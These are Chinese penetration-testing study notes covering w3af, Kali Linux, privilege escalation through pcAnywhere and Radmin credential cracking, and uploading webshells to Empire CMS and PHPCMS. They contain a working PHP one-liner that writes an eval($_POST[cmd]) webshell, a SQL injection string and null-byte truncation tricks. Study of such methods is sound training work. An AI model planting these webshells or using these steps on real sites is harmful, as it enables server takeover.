***w3af***
w3af是web application attack and audit framework(web应用攻击和安全审计框架)的缩写
它是一个开源的web应用安全扫描器和漏洞利用工具
两种使用方式:
一种图形界面
二种是命令行
渗透测试学习笔记31-kali安装信息收集
web高级渗透测试工程师
kali安装-信息搜集-服务器扫描
Kali Linux前身是BackTrack(基于ubuntu)是一个基于Debian的Linux发行版,包含很多安全和取证方面的相关工具.支持ARM架构
Kali Linux是基于Debian的Linux发行版,设计用于数字取证和渗透测试和黑客攻防.由Offensive Security Ltd维护和资助.最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版.
Kali Linux预装了许多渗透测试软件,包括nmap(端口扫描器),Wireshark(数据包分析器),John the Ripper(密码破解器),以及Aircrack-ng(一套用于对无线局域网进行渗透测试的软件).用户可通过硬盘,live CD或live USB运行Kali Linux.Metasploit的Metasploit Framework支持Kali Linux.Metasploit一套针对远程主机进行开发和执行Exploit代码的工具.
取证可以电子取证,逆向可以逆向,无线可以无线.
kali-tools/tools_zh.html:对kali工具包的中文翻译
渗透测试学习笔记26-权限下
远程管理软件提权
pcanywhere
访问pcanywhere默认安装目录
下载用户配置文件
通过破解账户密码文件
大马->pcanywhere->host/remotes->PCA admin CIF(远程登录用户的配置文件)->下载,并破解
权限提升->第三方工具提权->pcanywhere提权->进行破解
攻击端也要安装一个pcanywhere,添加下一步->连接的ip指定一下,勾选连接被控端
radmin提权
通过端口扫描 扫描4899端口
上传radmin.asp木马读取radmin的加密密文
使用工具连接
渗透测试学习笔记25-权限提升
帝国->
系统->数据表与系统模型->管理数据表->管理系统模型->导入
xx.php.mod
<?fputs(fopen("cao.php"."w"),"<?eval(\$_POST[cmd]);?>")?>
phpcms
界面->模板风格->search->修改,可视化->一句话
内容->选择附件上传->图片
系统设置->Ucenter api->一句话(要闭合)
00截断,存在注入漏洞 admin' or '1' = '1